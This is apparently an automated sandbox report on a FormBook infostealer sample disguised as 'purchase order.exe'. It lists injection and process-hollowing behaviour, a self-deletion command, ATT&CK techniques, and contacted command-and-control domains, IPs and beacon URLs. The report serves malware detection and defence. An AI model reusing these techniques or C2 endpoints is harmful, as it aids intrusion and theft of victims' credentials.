            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EFF10 mov eax, dword ptr fs:[00000030h]5_2_048EFF10
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EFF10 mov eax, dword ptr fs:[00000030h]5_2_048EFF10
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0492070D mov eax, dword ptr fs:[00000030h]5_2_0492070D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0492070D mov eax, dword ptr fs:[00000030h]5_2_0492070D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04854F2E mov eax, dword ptr fs:[00000030h]5_2_04854F2E
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04854F2E mov eax, dword ptr fs:[00000030h]5_2_04854F2E
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488E730 mov eax, dword ptr fs:[00000030h]5_2_0488E730
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486EF40 mov eax, dword ptr fs:[00000030h]5_2_0486EF40
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486FF60 mov eax, dword ptr fs:[00000030h]5_2_0486FF60
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04928F6A mov eax, dword ptr fs:[00000030h]5_2_04928F6A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04859080 mov eax, dword ptr fs:[00000030h]5_2_04859080
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D3884 mov eax, dword ptr fs:[00000030h]5_2_048D3884
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D3884 mov eax, dword ptr fs:[00000030h]5_2_048D3884
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048990AF mov eax, dword ptr fs:[00000030h]5_2_048990AF
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h]5_2_048820A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h]5_2_048820A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h]5_2_048820A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h]5_2_048820A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h]5_2_048820A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h]5_2_048820A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488F0BF mov ecx, dword ptr fs:[00000030h]5_2_0488F0BF
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488F0BF mov eax, dword ptr fs:[00000030h]5_2_0488F0BF
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488F0BF mov eax, dword ptr fs:[00000030h]5_2_0488F0BF
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h]5_2_048EB8D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EB8D0 mov ecx, dword ptr fs:[00000030h]5_2_048EB8D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h]5_2_048EB8D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h]5_2_048EB8D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h]5_2_048EB8D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h]5_2_048EB8D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048540E1 mov eax, dword ptr fs:[00000030h]5_2_048540E1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048540E1 mov eax, dword ptr fs:[00000030h]5_2_048540E1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048540E1 mov eax, dword ptr fs:[00000030h]5_2_048540E1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048558EC mov eax, dword ptr fs:[00000030h]5_2_048558EC
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04924015 mov eax, dword ptr fs:[00000030h]5_2_04924015
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04924015 mov eax, dword ptr fs:[00000030h]5_2_04924015
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D7016 mov eax, dword ptr fs:[00000030h]5_2_048D7016
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D7016 mov eax, dword ptr fs:[00000030h]5_2_048D7016
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D7016 mov eax, dword ptr fs:[00000030h]5_2_048D7016
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488002D mov eax, dword ptr fs:[00000030h]5_2_0488002D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488002D mov eax, dword ptr fs:[00000030h]5_2_0488002D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488002D mov eax, dword ptr fs:[00000030h]5_2_0488002D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488002D mov eax, dword ptr fs:[00000030h]5_2_0488002D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488002D mov eax, dword ptr fs:[00000030h]5_2_0488002D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h]5_2_0486B02A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h]5_2_0486B02A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h]5_2_0486B02A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h]5_2_0486B02A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04870050 mov eax, dword ptr fs:[00000030h]5_2_04870050
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04870050 mov eax, dword ptr fs:[00000030h]5_2_04870050
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04912073 mov eax, dword ptr fs:[00000030h]5_2_04912073
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04921074 mov eax, dword ptr fs:[00000030h]5_2_04921074
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487C182 mov eax, dword ptr fs:[00000030h]5_2_0487C182
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488A185 mov eax, dword ptr fs:[00000030h]5_2_0488A185
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04882990 mov eax, dword ptr fs:[00000030h]5_2_04882990
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048861A0 mov eax, dword ptr fs:[00000030h]5_2_048861A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048861A0 mov eax, dword ptr fs:[00000030h]5_2_048861A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D69A6 mov eax, dword ptr fs:[00000030h]5_2_048D69A6
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h]5_2_048D51BE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h]5_2_048D51BE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h]5_2_048D51BE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h]5_2_048D51BE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h]5_2_049149A4
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h]5_2_049149A4
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h]5_2_049149A4
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h]5_2_049149A4
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485B1E1 mov eax, dword ptr fs:[00000030h]5_2_0485B1E1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485B1E1 mov eax, dword ptr fs:[00000030h]5_2_0485B1E1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485B1E1 mov eax, dword ptr fs:[00000030h]5_2_0485B1E1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048E41E8 mov eax, dword ptr fs:[00000030h]5_2_048E41E8
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04859100 mov eax, dword ptr fs:[00000030h]5_2_04859100
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04859100 mov eax, dword ptr fs:[00000030h]5_2_04859100
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04859100 mov eax, dword ptr fs:[00000030h]5_2_04859100
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04874120 mov eax, dword ptr fs:[00000030h]5_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04874120 mov eax, dword ptr fs:[00000030h]5_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04874120 mov eax, dword ptr fs:[00000030h]5_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04874120 mov eax, dword ptr fs:[00000030h]5_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04874120 mov ecx, dword ptr fs:[00000030h]5_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488513A mov eax, dword ptr fs:[00000030h]5_2_0488513A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488513A mov eax, dword ptr fs:[00000030h]5_2_0488513A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487B944 mov eax, dword ptr fs:[00000030h]5_2_0487B944
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487B944 mov eax, dword ptr fs:[00000030h]5_2_0487B944
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485C962 mov eax, dword ptr fs:[00000030h]5_2_0485C962
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485B171 mov eax, dword ptr fs:[00000030h]5_2_0485B171
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485B171 mov eax, dword ptr fs:[00000030h]5_2_0485B171
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488D294 mov eax, dword ptr fs:[00000030h]5_2_0488D294
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488D294 mov eax, dword ptr fs:[00000030h]5_2_0488D294
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h]5_2_048552A5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h]5_2_048552A5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h]5_2_048552A5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h]5_2_048552A5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h]5_2_048552A5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486AAB0 mov eax, dword ptr fs:[00000030h]5_2_0486AAB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486AAB0 mov eax, dword ptr fs:[00000030h]5_2_0486AAB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488FAB0 mov eax, dword ptr fs:[00000030h]5_2_0488FAB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04882ACB mov eax, dword ptr fs:[00000030h]5_2_04882ACB
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04882AE4 mov eax, dword ptr fs:[00000030h]5_2_04882AE4
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491AA16 mov eax, dword ptr fs:[00000030h]5_2_0491AA16
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491AA16 mov eax, dword ptr fs:[00000030h]5_2_0491AA16
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04868A0A mov eax, dword ptr fs:[00000030h]5_2_04868A0A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485AA16 mov eax, dword ptr fs:[00000030h]5_2_0485AA16
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485AA16 mov eax, dword ptr fs:[00000030h]5_2_0485AA16
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04855210 mov eax, dword ptr fs:[00000030h]5_2_04855210
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04855210 mov ecx, dword ptr fs:[00000030h]5_2_04855210
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04855210 mov eax, dword ptr fs:[00000030h]5_2_04855210
            Source: C:\Users\user\Desktop\purchase order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 154.3.112.106 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 192.252.210.84 80Jump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\purchase order.exeMemory written: C:\Users\user\Desktop\purchase order.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\purchase order.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\purchase order.exeThread register set: target process: 3440Jump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440Jump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\purchase order.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\purchase order.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: F60000Jump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exeJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe'Jump to behavior
            Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
            Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Users\user\Desktop\purchase order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_06A2A4C0 GetUserNameA,0_2_06A2A4C0
            Source: C:\Users\user\Desktop\purchase order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery331Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion14Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion14Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323034 Sample: purchase order.exe Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 31 www.keystonefulfillment.com 2->31 33 g.msn.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 8 other signatures 2->47 11 purchase order.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\purchase order.exe.log, ASCII 11->29 dropped 57 Injects a PE file into a foreign processes 11->57 15 purchase order.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 35 purehempbotanicalsinfo.com 154.3.112.106, 49759, 80 UNMETEREDCA United States 18->35 37 makgxoimisitzer.info 192.252.210.84, 49754, 80 TOTAL-SERVER-SOLUTIONSUS United States 18->37 39 4 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 msdt.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            purchase order.exe29%VirustotalBrowse
            purchase order.exe19%ReversingLabsWin32.Trojan.Wacatac
            purchase order.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            2.2.purchase order.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.purehempbotanicalsinfo.com/sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp0%Avira URL Cloudsafe
            http://www.rettexo.com/sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.makgxoimisitzer.info/sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            rettexo.com
            		34.102.136.180
            		truetrue
              		unknown
              makgxoimisitzer.info
              		192.252.210.84
              		truetrue
                		unknown
                www.keystonefulfillment.com
                		52.58.78.16
                		truefalse
                  		unknown
                  purehempbotanicalsinfo.com
                  		154.3.112.106
                  		truetrue
                    		unknown
                    www.makgxoimisitzer.info
                    		unknown
                    		unknowntrue
                      		unknown
                      www.rettexo.com
                      		unknown
                      		unknowntrue
                        		unknown
                        g.msn.com
                        		unknown
                        		unknownfalse
                          		high
                          www.purehempbotanicalsinfo.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
